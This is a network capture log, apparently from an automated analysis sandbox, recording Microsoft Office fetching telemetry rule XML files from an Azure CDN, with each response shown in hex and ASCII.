2024-12-07 09:51:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:38 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 32c7b88d-b01e-003e-5b01-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095138Z-r1cf579d7789trgthC1EWRkkfc00000002rg0000000019pd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:38 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.6	49794	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:38 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:38 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 30883f21-801e-00a0-1802-482196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095138Z-r1cf579d778bb9vvhC1EWRs95400000001mg000000001v74 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:38 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.6	49791	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:38 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:38 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: e267231f-301e-0099-3103-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095138Z-r1cf579d778lntp7hC1EWR9gg400000001cg0000000037hg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:38 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.6	49796	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:40 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:40 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: d23b658c-101e-000b-2402-485e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095140Z-r1cf579d7789trgthC1EWRkkfc00000002n0000000003894 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:40 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.6	49797	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:40 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:40 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 2968f52d-d01e-002b-1502-4825fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095140Z-r1cf579d778xr2r4hC1EWRqvfs00000002300000000019x1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:40 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.6	49798	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:40 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:40 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 072142d6-401e-0029-0802-489b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095140Z-r1cf579d778kr8xrhC1EWRfkun00000002k0000000000ndf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:40 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.6	49800	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:40 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:40 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: eee9af6d-a01e-001e-1905-4849ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095140Z-r1cf579d778dfdgnhC1EWRd3w000000001t00000000031by x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:40 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.6	49799	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:40 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:40 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 836d2ba0-b01e-0070-7302-481cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095140Z-r1cf579d778lntp7hC1EWR9gg400000001c0000000003sy2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:40 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.6	49802	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:42 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:42 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 32c7c32d-b01e-003e-2b01-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095142Z-r1cf579d778dfdgnhC1EWRd3w000000001s0000000003r2r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:43 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.6	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:42 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:42 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 7b814a2b-101e-0017-4003-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095142Z-r1cf579d778xq4f9hC1EWRx41g00000001z00000000001qm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:43 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.6	49805	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:42 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:42 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: a7f5343d-701e-001e-5304-48f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095142Z-r1cf579d778w59f9hC1EWRze6w000000025g000000003b9c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:43 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.6	49804	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:42 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:42 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 45682ef5-801e-0048-7703-48f3fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095142Z-r1cf579d778t6txphC1EWRsd4400000002kg000000000nxf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:43 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.6	49806	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
